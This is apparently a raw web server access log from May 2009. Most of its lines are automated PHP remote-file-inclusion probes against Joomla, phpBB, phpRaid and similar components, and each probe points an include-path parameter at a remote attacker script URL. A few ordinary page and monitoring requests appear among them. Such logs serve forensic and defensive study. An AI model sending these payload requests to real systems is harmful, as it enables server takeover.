66.220.4.131 - - [16/May/2009:01:51:55 -0400] "GET /logs/rss.php?phpraid_dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 210 "-" "libwww-perl/5.803"
66.220.4.131 - - [16/May/2009:01:51:55 -0400] "GET /logs/access_log.Q108072200/rss.php?phpraid_dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
66.220.4.131 - - [16/May/2009:01:51:55 -0400] "GET /rss.php?phpraid_dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 205 "-" "libwww-perl/5.803"
217.18.76.16 - - [16/May/2009:01:51:58 -0400] "GET /logs/access_log.Q109050900//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:01:51:58 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:01:51:58 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
72.52.255.82 - - [16/May/2009:01:52:06 -0400] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 242 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:01:52:06 -0400] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 247 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
66.220.4.131 - - [16/May/2009:01:52:10 -0400] "GET /logs/access_log.Q109051200/rss.php?phpraid_dir=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
171.64.75.45 - - [16/May/2009:01:52:10 -0400] "GET //?sIncPath=http://www.shababek.de/baner.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
171.64.75.45 - - [16/May/2009:01:52:10 -0400] "GET /logs/access_log.Q109031500//?sIncPath=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
171.64.75.45 - - [16/May/2009:01:52:11 -0400] "GET /logs//?sIncPath=http://www.shababek.de/baner.txt?? HTTP/1.1" 200 1557 "-" "Mozilla/5.0"
213.246.39.167 - - [16/May/2009:01:52:13 -0400] "GET /logs/access_log.Q108082000//?sIncPath=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.18.76.16 - - [16/May/2009:01:52:14 -0400] "GET /logs/error_log.Q108090800//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
193.25.197.14 - - [16/May/2009:01:52:18 -0400] "GET /logs//?sIncPath=http://www.shababek.de/baner.txt?? HTTP/1.1" 200 1557 "-" "Mozilla/5.0"
193.25.197.14 - - [16/May/2009:01:52:19 -0400] "GET //?sIncPath=http://www.shababek.de/baner.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
193.25.197.14 - - [16/May/2009:01:52:20 -0400] "GET /logs/access_log.Q109031500//?sIncPath=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
171.64.75.45 - - [16/May/2009:01:52:34 -0400] "GET /logs/access_log.Q108082000//?sIncPath=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.18.76.16 - - [16/May/2009:01:53:45 -0400] "GET /logs/access_log.Q108123000//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
122.116.178.20 - - [16/May/2009:01:53:46 -0400] "GET /logs/error_log.Q109030900//tellmatic/include/Classes.inc.php?tm_includepath=http://www.ladyboss.com.ua/readme.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
122.116.178.20 - - [16/May/2009:01:53:47 -0400] "GET //tellmatic/include/Classes.inc.php?tm_includepath=http://www.ladyboss.com.ua/readme.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
122.116.178.20 - - [16/May/2009:01:53:47 -0400] "GET /logs//tellmatic/include/Classes.inc.php?tm_includepath=http://www.ladyboss.com.ua/readme.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
122.116.178.20 - - [16/May/2009:01:53:51 -0400] "GET /logs/error_log.Q109030900//tellmatic/include/Classes.inc.php?tm_includepath=http://www.ladyboss.com.ua/readme.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
190.144.44.36 - - [16/May/2009:01:53:52 -0400] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
122.116.178.20 - - [16/May/2009:01:53:52 -0400] "GET //tellmatic/include/Classes.inc.php?tm_includepath=http://www.ladyboss.com.ua/readme.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
190.144.44.36 - - [16/May/2009:01:53:52 -0400] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
122.116.178.20 - - [16/May/2009:01:53:52 -0400] "GET /logs//tellmatic/include/Classes.inc.php?tm_includepath=http://www.ladyboss.com.ua/readme.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
62.146.68.61 - - [16/May/2009:01:54:05 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:54:05 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:54:05 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:54:05 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:54:05 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:54:05 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:54:09 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:54:09 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:54:09 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:54:09 -0400] "GET /logs/access_log.Q108060200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
193.25.197.14 - - [16/May/2009:01:54:09 -0400] "GET /logs/access_log.Q108082000//?sIncPath=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:54:09 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:54:09 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:54:09 -0400] "GET /logs/access_log.Q108052400%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:54:09 -0400] "GET /logs/access_log.Q108060200%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:54:10 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:54:10 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:54:10 -0400] "GET /logs/access_log.Q108052400%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:54:10 -0400] "GET /logs/access_log.Q108060200%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:54:11 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:54:11 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:54:11 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:54:11 -0400] "GET /logs/access_log.Q108060200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
217.18.76.16 - - [16/May/2009:01:54:12 -0400] "GET /logs/error_log.Q109050900//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
62.146.68.61 - - [16/May/2009:01:54:17 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:54:17 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:54:17 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:54:17 -0400] "GET /logs/access_log.Q108060200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
171.64.75.45 - - [16/May/2009:01:54:17 -0400] "GET /logs/access_log.Q109031500%20%20//?sIncPath=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
171.64.75.45 - - [16/May/2009:01:54:28 -0400] "GET /logs/access_log.Q108082000%20%20//?sIncPath=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
121.254.229.131 - - [16/May/2009:01:54:40 -0400] "GET //?sIncPath=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
121.254.229.131 - - [16/May/2009:01:54:40 -0400] "GET /logs//?sIncPath=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 200 1557 "-" "Mozilla/5.0"
121.254.229.131 - - [16/May/2009:01:54:53 -0400] "GET /logs/access_log.Q109031500//?sIncPath=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
69.172.92.14 - - [16/May/2009:01:55:03 -0400] "GET /logs/access_log.Q109050900//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:01:55:04 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:01:55:04 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
87.106.135.14 - - [16/May/2009:01:55:15 -0400] "GET /logs/access_log.Q109050900//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
62.146.68.61 - - [16/May/2009:01:55:15 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:55:15 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:55:15 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
62.146.68.61 - - [16/May/2009:01:55:15 -0400] "GET /logs/access_log.Q108060200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
87.106.135.14 - - [16/May/2009:01:55:15 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:01:55:16 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
121.254.229.131 - - [16/May/2009:01:55:16 -0400] "GET /logs/access_log.Q108082000//?sIncPath=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.18.76.16 - - [16/May/2009:01:55:36 -0400] "GET /logs/access_log.Q108090800//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
213.246.39.167 - - [16/May/2009:01:55:38 -0400] "GET /logs/error_log.Q109041300%20%20//?sIncPath=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
213.246.39.167 - - [16/May/2009:01:55:44 -0400] "GET /logs/error_log.Q108082000%20%20//?sIncPath=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
88.84.128.40 - - [16/May/2009:01:55:49 -0400] "GET /logs/access_log.Q109050900//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:01:55:49 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:01:55:50 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
87.106.135.14 - - [16/May/2009:01:55:53 -0400] "GET /logs/access_log.Q109050900//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:01:55:53 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:01:55:54 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
69.172.92.14 - - [16/May/2009:01:55:55 -0400] "GET /logs/access_log.Q109050900//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:01:55:55 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:01:55:55 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
122.173.87.107 - - [16/May/2009:01:55:56 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
122.173.87.107 - - [16/May/2009:01:55:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
122.173.87.107 - - [16/May/2009:01:56:04 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
122.173.87.107 - - [16/May/2009:01:56:04 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
209.59.12.99 - - [16/May/2009:01:56:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.135.14 - - [16/May/2009:01:56:22 -0400] "GET /logs/error_log.Q108090800//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
69.172.92.14 - - [16/May/2009:01:56:23 -0400] "GET /logs/error_log.Q108090800//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
190.144.44.36 - - [16/May/2009:01:56:46 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 254 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
190.144.44.36 - - [16/May/2009:01:56:46 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 249 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
72.52.230.168 - - [16/May/2009:01:56:52 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:01:56:52 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:01:56:52 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:01:57:16 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:57:16 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 278 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
121.254.229.131 - - [16/May/2009:01:57:29 -0400] "GET /logs/access_log.Q109031500%20%20//?sIncPath=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:01:57:32 -0400] "GET /logs/access_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:01:57:32 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 238 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:01:57:32 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
121.254.229.131 - - [16/May/2009:01:57:43 -0400] "GET /logs/access_log.Q108082000%20%20//?sIncPath=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.172.92.14 - - [16/May/2009:01:58:21 -0400] "GET /logs/access_log.Q108100600//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
110.45.144.106 - - [16/May/2009:01:58:29 -0400] "GET /logs/access_log.Q109020500//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:01:58:35 -0400] "GET /logs/access_log.Q108112900//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:01:58:47 -0400] "GET /logs/access_log.Q109020600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:01:58:48 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:01:58:48 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:01:58:48 -0400] "GET /logs/access_log.Q109020600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:01:58:51 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:01:58:51 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
87.106.135.14 - - [16/May/2009:01:58:52 -0400] "GET /logs/access_log.Q108100600//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
72.232.198.162 - - [16/May/2009:01:58:59 -0400] "GET /logs/access_log.Q109020500/admin/inc/change_action.php?format_menue=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:01:59:06 -0400] "GET /logs/access_log.Q108082400//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:01:59:07 -0400] "GET /logs/access_log.Q108082400//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
75.22.73.43 - - [16/May/2009:01:59:09 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.22.73.43 - - [16/May/2009:01:59:09 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.22.73.43 - - [16/May/2009:01:59:16 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.22.73.43 - - [16/May/2009:01:59:16 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
88.84.128.40 - - [16/May/2009:01:59:27 -0400] "GET /logs/access_log.Q109050900//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:01:59:27 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
